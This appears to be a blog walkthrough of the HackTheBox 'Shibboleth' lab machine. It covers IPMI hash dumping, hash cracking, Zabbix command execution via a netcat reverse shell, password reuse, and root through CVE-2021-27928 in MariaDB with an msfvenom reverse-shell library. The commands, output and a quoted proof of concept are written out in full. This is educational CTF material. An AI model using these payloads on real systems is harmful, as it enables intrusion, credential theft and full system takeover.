TL;DR
This is a walkthrough writeup on Shibboleth which is a Linux box categorized as medium difficulty on HackTheBox.The initial foothold was gained by dumping the IPMI password hashes through the asf-rmcp service running on UDP port 623 & leveraging these credentials to get code execution through the Zabbix server dashboard. Lateral privesc was made possible through password reuse. Privilege escalation to root user was gained by exploiting an eval injection vulnerability in the MariabDB database version that was being used on the box.
Walkthrough
Shibboleth Writeup: Scanning Network
Scanning ports with Nmap :
Command : nmap -p 80 -sC -sV -A -n -Pn -oN nmap.initial 10.10.11.124
Nmap scan report for 10.10.11.124
Host is up (0.26s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41
|_http-title: Did not follow redirect to http://shibboleth.htb/
We see an Apache Web Server running on TCP port 80
Scanning the UDP ports :
Command : nmap -sU --min-rate 1000 -n -Pn $IP
Nmap scan report for 10.10.11.124
Host is up (0.26s latency).
Not shown: 989 open|filtered udp ports (no-response)
PORT STATE SERVICE
137/udp closed netbios-ns
623/udp open asf-rmcp
1022/udp closed exp2
1038/udp closed mtqp
18485/udp closed unknown
19933/udp closed unknown
22053/udp closed unknown
22986/udp closed unknown
32815/udp closed unknown
49154/udp closed unknown
58797/udp closed unknown
We have UDP port 623 open, running a service asf-rmcp.
Website Enumeration
On browsing the IP address, we were being redirected to shibboleth.htb indicating that the server is using virtual host routing. Thus, let us add an appropriate entry in the /etc/hosts file :
10.10.11.124 shibboleth.htb
I saw that the “Contact Us form” was throwing an error (seemed probably because a certain required library was not installed):
Found nothing worth use on this website. Moving ahead with sub-directory enumeration.
Dirbuster Scan
/forms/
Readme.txt
This was just a Bootstrap information file :
contact.php
This had the same error message which we encountered earlier :
Sub-Domain Enumeration
We will be using the wfuzz tool, and also include the -H flag to add a Host header because the server is using virtual host routing :
โโโ(root๐kali)-[~/Desktop/Boxes/HTB/Shibboleth]
โโ# wfuzz -H "Host: FUZZ.shibboleth.htb" --hl 9 -c -w /usr/share/wordlists/secLists/subdomains-top1million-5000.txt $IP
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.10.11.124/
Total requests: 4989
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000099: 200 29 L 219 W 3684 Ch "monitor"
000000346: 200 29 L 219 W 3684 Ch "monitoring"
000000390: 200 29 L 219 W 3684 Ch "zabbix"
Total time: 0
Processed Requests: 4989
Filtered Requests: 4986
Requests/sec.: 0We found 3 sub-domains, so let’s add them to the /etc/hosts file.
10.10.11.124 shibboleth.htb monitor.shibboleth.htb monitoring.shibboleth.htb zabbix.shibboleth.htbWell, on browsing, all the three sub-domains lead to the same page –> Zabbix login page
What is Zabbix ? Zabbix is an open-source monitoring software tool for diverse IT components, including networks, servers, virtual machines and cloud services. Zabbix provides monitoring metrics, among others network utilization, CPU load and disk space consumption.
I tried a bunch of default credentials here, but none of them worked.
I was kinda hitting a wall here, but wait, remember that UDP port we found? Let’s enumerate that ๐
Enumerating port 623 running asf-rmcp
What is asf-rmcp ? ASF is a DMTF standard that provides a remote control and alerting interface between management consoles and ASF-aware hosts. RMCP is a network protocol used by a management console to remotely control an ASF-aware host. This makes sense, because the host is running Zabbix, which is a monitoring software tool.
Dumping IPMI hashes
On googling, I stumbled upon this blog 623/UDP/TCP – IPMI – HackTricks
It has a section talking about “dumping IPMI hashes” using a Metasploit module, going ahead with this :
msf6 auxiliary(scanner/ipmi/ipmi_version) > use auxiliary/scanner/ipmi/ipmi_dumphashes
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > options
Module options (auxiliary/scanner/ipmi/ipmi_dumphashes):
Name Current Setting Required Description
---- --------------- -------- -----------
CRACK_COMMON true yes Automatically crack common passwords as they are obtained
OUTPUT_HASHCAT_FILE no Save captured password hashes in hashcat format
OUTPUT_JOHN_FILE no Save captured password hashes in john the ripper format
PASS_FILE /usr/share/metasploit-framework/data/wordlists/ipmi_passw yes File containing common passwords for offline cracking, one per line
ords.txt
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 623 yes The target port
SESSION_MAX_ATTEMPTS 5 yes Maximum number of session retries, required on certain BMCs (HP iLO 4, etc)
SESSION_RETRY_DELAY 5 yes Delay between session retries in seconds
THREADS 1 yes The number of concurrent threads (max one per host)
USER_FILE /usr/share/metasploit-framework/data/wordlists/ipmi_users yes File containing usernames, one per line
.txt
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > set RHOSTS 10.10.11.124
RHOSTS => 10.10.11.124
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > run
[+] 10.10.11.124:623 - IPMI - Hash found: Administrator:4458aac582020000479fa54d6008d9318aaf7129bfdcd2cc4ad4221b7e41c0f40c59e380513da442a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:1af2e66206082e7b78a920cc983f862daab424ae
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completedWe did obtain a password hash for the user Administrator :
Administrator:4458aac582020000479fa54d6008d9318aaf7129bfdcd2cc4ad4221b7e41c0f40c59e380513da442a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:1af2e66206082e7b78a920cc983f862daab424ae
Cracking the obtained hash using hashcat
We checked the manual page for hashcat and saw that mode 7300 --> IPMI2 RAKP HMAC-SHA1.
hashcat.exe -m 7300 -a 0 -o ./wordlists/cracked.txt ./wordlists/hash.txt ./wordlists/rockyou.txt4458aac582020000479fa54d6008d9318aaf7129bfdcd2cc4ad4221b7e41c0f40c59e380513da442a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:1af2e66206082e7b78a920cc983f862daab424ae
ilovepumkinpie1Shibboleth Writeup: Zabbix Dashboard (logging in with obtained creds)
user : Administrator
pass : ilovepumkinpie1
Shibboleth Writeup: Shell as zabbix
Now, the next challenge to somehow get code execution through the access we got on Zabbix. On googling around, I found this old video by our teacher, Ippsec –> HackTheBox – Zipper – YouTube , in which he talks about how we can get authenticated code execution on Zabbix :
Going to the “Configuration –> Hosts” section, and choose the host on which you are concerned about, shibboleth.htb in our case :
Going to the “Items” section, and on the top right goto “Create Item” :
What is item in Zabbix ? Items are the ones that gather data from a host. Once you have configured a host, you need to add some monitoring items to start getting actual data.
We will fill up the fields, including the “Key” field with the reverse shell command by choosing ‘system.run‘ option from the drop-down list.
system.run key needs two arguments command and mode. We will give the reverse shell command as the first argument (command), and for mode parameter, we will use, nowait, because we want the reverse shell command to execute without wait.
Here is the complete command :
system.run[rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.11 1234 >/tmp/f,nowait]
Hit the “Test” option and then, click on “Get Value” to run the command & obtain a reverse shell.
Obtaining a reverse shell as user zabbix on our listening port :
โโโ(root๐kali)-[~/Desktop/Boxes/HTB/Shibboleth]
โโ# nc -nvlp 1337
listening on [any] 1337 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.11.124] 32832
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=110(zabbix) gid=118(zabbix) groups=118(zabbix)
$ which python3
/usr/bin/python3
$ python3 -c "import pty;pty.spawn('/bin/bash')"
zabbix@shibboleth:/$ id
uid=110(zabbix) gid=118(zabbix) groups=118(zabbix)Shibboleth Writeup: User Flag โณ
Shell as ipmi-svc
We enumerated the file system and found out another user impi-svc. Using the password we found for Zabbix, we were able to switch to user ipmi-svc (password reuse) :
zabbix@shibboleth:/var/www/html$ su ipmi-svc
Password:
ipmi-svc@shibboleth:/var/www/html$
ipmi-svc@shibboleth:~$ cat user.txt
540b1***************************Privilege Escalation
On further enumerating the file system, I found a config file for the Zabbix server, which revealed the database credentials :
FILE : /etc/zabbix/zabbix_server.conf
ipmi-svc@shibboleth:~$ cat /etc/zabbix/zabbix_server.conf | grep -v \^\# | grep -v '^$'
LogFile=/var/log/zabbix/zabbix_server.log
LogFileSize=0
PidFile=/run/zabbix/zabbix_server.pid
SocketDir=/run/zabbix
DBName=zabbix
DBUser=zabbix
DBPassword=bloooarskybluh
SNMPTrapperFile=/var/log/snmptrap/snmptrap.log
Timeout=4
AlertScriptsPath=/usr/lib/zabbix/alertscripts
ExternalScripts=/usr/lib/zabbix/externalscripts
FpingLocation=/usr/bin/fping
Fping6Location=/usr/bin/fping6
LogSlowQueries=3000
StatsAllowedIP=127.0.0.1DBName=zabbix
DBUser=zabbix
DBPassword=bloooarskybluhI immediately tried to connect to the MySQL database using the above creds & found some password hashes for the users of Zabbix
ipmi-svc@shibboleth:~$ mysql -D zabbix -u zabbix -p
Enter password:
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 3876
Server version: 10.3.25-MariaDB-0ubuntu0.20.04.1 Ubuntu 20.04
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [zabbix]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| zabbix |
+--------------------+
2 rows in set (0.001 sec)
MariaDB [zabbix]> use zabbix;
Database changed
MariaDB [zabbix]> show tables;
+----------------------------+
| Tables_in_zabbix |
+----------------------------+
********SNIP*******
| users |
*******SNIP*********
MariaDB [zabbix]> select userid,alias,name,surname,passwd from users;
+--------+---------------+--------------+---------------+--------------------------------------------------------------+
| userid | alias | name | surname | passwd |
+--------+---------------+--------------+---------------+--------------------------------------------------------------+
| 1 | Admin | Zabbix | Administrator | $2y$10$L9tjKByfruByB.BaTQJz/epcbDQta4uRM/KySxSZTwZkMGuKTPPT2 |
| 2 | guest | | | $2y$10$89otZrRNmde97rIyzclecuk6LwKAsHN0BcvoOKGjbT.BwMBfm7G06 |
| 3 | Administrator | IPMI Service | Account | $2y$10$FhkN5OCLQjs3d6C.KtQgdeCc485jKBWPW4igFVEgtIP3jneaN7GQe |
+--------+---------------+--------------+---------------+--------------------------------------------------------------+
3 rows in set (0.000 sec)Although, we already had the password for the Admin user of Zabbix console but the database seemingly has 2 different Admin accounts and password hashes.
I tried to crack the hash for the Admin users but its a bcrypt hash, and was taking a hell lot of time. I did run hashcat for a while on it, but soon realized that this wasn’t the intended pathway for rooting this box.
After enumerating a lot, I was almost hitting a wall, but then I went on to check exploits for the services running on the box. And fortunately enough, I found something potentially exploitable.
Vulnerable DB version
The DB version is displayed to us when we log in to the database :
Server version: 10.3.25-MariaDB-0ubuntu0.20.04.1 Ubuntu 20.04Searching for exploits for this version :
โโโ(root๐kali)-[~/Desktop/Boxes/HTB/Shibboleth]
โโ# searchsploit mariadb 10
---------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
MariaDB 10.2 - 'wsrep_provider' OS Command Execution | linux/local/49765.txt
MariaDB Client 10.1.26 - Denial of Service (PoC) | linux/dos/45901.txt
---------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No ResultsOn googling around, I found that the MariaDB version 10.3.25 is vulnerable to CVE-2021-27928 :
MariaDB 10.2 Command Execution โ Packet Storm (packetstormsecurity.com)
Exploit : An untrusted search path leads to eval injection, in which a database SUPER user can execute OS commands after modifying 'wsrep_provider' and 'wsrep_notify_cmd'. Can read more about the vulnerability here.
# Exploit Title: MariaDB 10.2 /MySQL - 'wsrep_provider' OS Command Execution
# Date: 03/18/2021
# Exploit Author: Central InfoSec
# Version: MariaDB 10.2 before 10.2.37, 10.3 before 10.3.28, 10.4 before 10.4.18, and 10.5 before 10.5.9; Percona Server through 2021-03-03; and the wsrep patch through 2021-03-03 for MySQL
# Tested on: Linux
# CVE : CVE-2021-27928
# Proof of Concept:
# Create the reverse shell payload
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f elf-so -o CVE-2021-27928.so
# Start a listener
nc -lvp <port>
# Copy the payload to the target machine (In this example, SCP/SSH is used)
scp CVE-2021-27928.so <user>@<ip>:/tmp/CVE-2021-27928.so
# Execute the payload
mysql -u <user> -p -h <ip> -e 'SET GLOBAL wsrep_provider="/tmp/CVE-2021-27928.so";'Following the exploit instructions –>
Exploit
Creating a reverse shell payload using msfvenom :
โโโ(root๐kali)-[~/Desktop/Boxes/HTB/Shibboleth]
โโ# msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.11 LPORT=6969 -f elf-so -o reverse.so
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of elf-so file: 476 bytes
Saved as: reverse.soTransferred it to the box by serving it on a Python server.
And setting the variable wsrep_provider with the value of the ‘path to the payload’, gives us a reverse shell as user root :
MariaDB [zabbix]> SET GLOBAL wsrep_provider="/home/ipmi-svc/reverse.so";
ERROR 2013 (HY000): Lost connection to MySQL server during query
MariaDB [zabbix]> Shibboleth Writeup: Root Flag โณ
โโโ(root๐kali)-[~/Desktop/Boxes/HTB/Shibboleth]
โโ# nc -nvlp 6969
listening on [any] 6969 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.11.124] 51714
id
uid=0(root) gid=0(root) groups=0(root)
pyhton3 -c "import pty;pty.spawn('/bin/bash')"
/bin/sh: 2: pyhton3: not found
python3 -c "import pty;pty.spawn('/bin/bash')"
root@shibboleth:/var/lib/mysql# id
id
uid=0(root) gid=0(root) groups=0(root)
root@shibboleth:/var/lib/mysql# cat /root/root.txt
cat /root/root.txt
7615e***************************Kudos for rooting Shibboleth. Until next time, keep hacking and do checkout other writeups and blogs on sheerazali.com
